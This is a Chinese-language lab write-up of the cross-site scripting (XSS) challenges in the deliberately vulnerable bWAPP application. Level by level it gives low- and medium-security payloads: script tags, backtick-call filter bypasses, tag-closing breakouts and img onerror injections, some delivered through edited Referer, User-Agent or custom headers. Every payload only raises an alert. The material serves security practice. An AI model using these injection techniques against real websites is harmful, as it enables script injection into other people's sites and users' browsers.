GET

将payload输入到First name中 ,Last name中随便输入点什么
payload:<script>alert('ok')</script>
bWAPP A3 XSS注入解题记录

POST

low payload:<script>alert('ok')</script>
medium payload:<script>alert`ok`</script>
bWAPP A3 XSS注入解题记录

JSON

low payload:"}]}';alert('ok');</script>
medium模式不会,符号被转换成了HTML实体
bWAPP A3 XSS注入解题记录

AJAX/JSON

low and medium payload:
<img src=1 onerror=alert('ok')>
bWAPP A3 XSS注入解题记录

AJAX/XML

low payload:&#60;img src=1 onerror=alert('ok')&#62;
medium payload:&#60;img src=1 onerror=alert`ok`&#62;
bWAPP A3 XSS注入解题记录

Back Button

开发者模式查看按钮
bWAPP A3 XSS注入解题记录发现可以将input标签进行闭合来实现注入,用burpsuite进行抓包,修改referer
bWAPP A3 XSS注入解题记录
low payload:'"><script>alert('ok')</script>
medium payload:'"><script>alert`ok`</script>

bWAPP A3 XSS注入解题记录

Custom Header

百度翻译了一下页面的提示,意思是 “一些web客户端使用自定义的HTTP请求头。。。我们的bWAPP头的内容:”
所以我们抓包自己写一个请求头
bWAPP A3 XSS注入解题记录low payload:bWAPP: <script>alert('ok')</script>
medium对单引号进行了过滤,所以换成以下payload
medium payload:bWAPP: <script>alert`ok`</script>
bWAPP A3 XSS注入解题记录

Eval

low 修改URL中的Data()为alert('ok')
bWAPP A3 XSS注入解题记录
medium 修改URL中的Data()如下图
bWAPP A3 XSS注入解题记录

HREF

随便输入个123后,查看源码,发现我们输入的132在p标签内,所以尝试闭合p标签
low payload:</p><script>alert('ok')</script>
bWAPP A3 XSS注入解题记录
medium 符号被转换成了HTML实体,所以不会

Login Form

这题貌似没有XSS 注入点(我没找到)但是可以用SQL注入,所以就不写了

phpMyAdmin BBCode Tag XSS

没思路。。。。。

PHP_SELF

First name输入payload Last name随便输入点什么
low payload:<script>alert('ok')</script>
medium payload:<script>alert`ok`</script>
bWAPP A3 XSS注入解题记录

Referer

看页面上的提示,发现referer的内容会显示在页面上,所以我们抓包修改referer 修改结果如图所示
bWAPP A3 XSS注入解题记录low payload:<script>alert('ok')</script>
medium payload:<script>alert`ok`</script>

bWAPP A3 XSS注入解题记录

User-Agent(反射型)

看页面上的提示,发现User-Agent的内容会显示在页面上,所以我们抓包修改User-Agent 修改结果如图所示
bWAPP A3 XSS注入解题记录
low payload:<script>alert('ok')</script>
medium payload:<script>alert`ok`</script>
bWAPP A3 XSS注入解题记录

Blog

随便输入个一二三,查看网页源码发现我们输入的内容在td标签内,所以我们尝试闭合td标签
low payload:<script>alert('ok')<script>
medium payload:<script>alert`ok`</script>
bWAPP A3 XSS注入解题记录

Change Secret

开发者模式下发现有一个type为hidden的input
bWAPP A3 XSS注入解题记录
将hidden修改为text,在新出现的文本框中输入payload
low payload:"><script>alert`ok`</script><"
bWAPP A3 XSS注入解题记录
medium不会

Cookies SQLiteManager XSS

貌似不止用到了XSS注入,好像还有点别的东西,其实我不会

Stored (User-Agent)

抓包修改User-Agent
bWAPP A3 XSS注入解题记录low payload:<script>alert('ok')</script>
medium payload:<script>alert`ok`</script>
bWAPP A3 XSS注入解题记录

相关文章: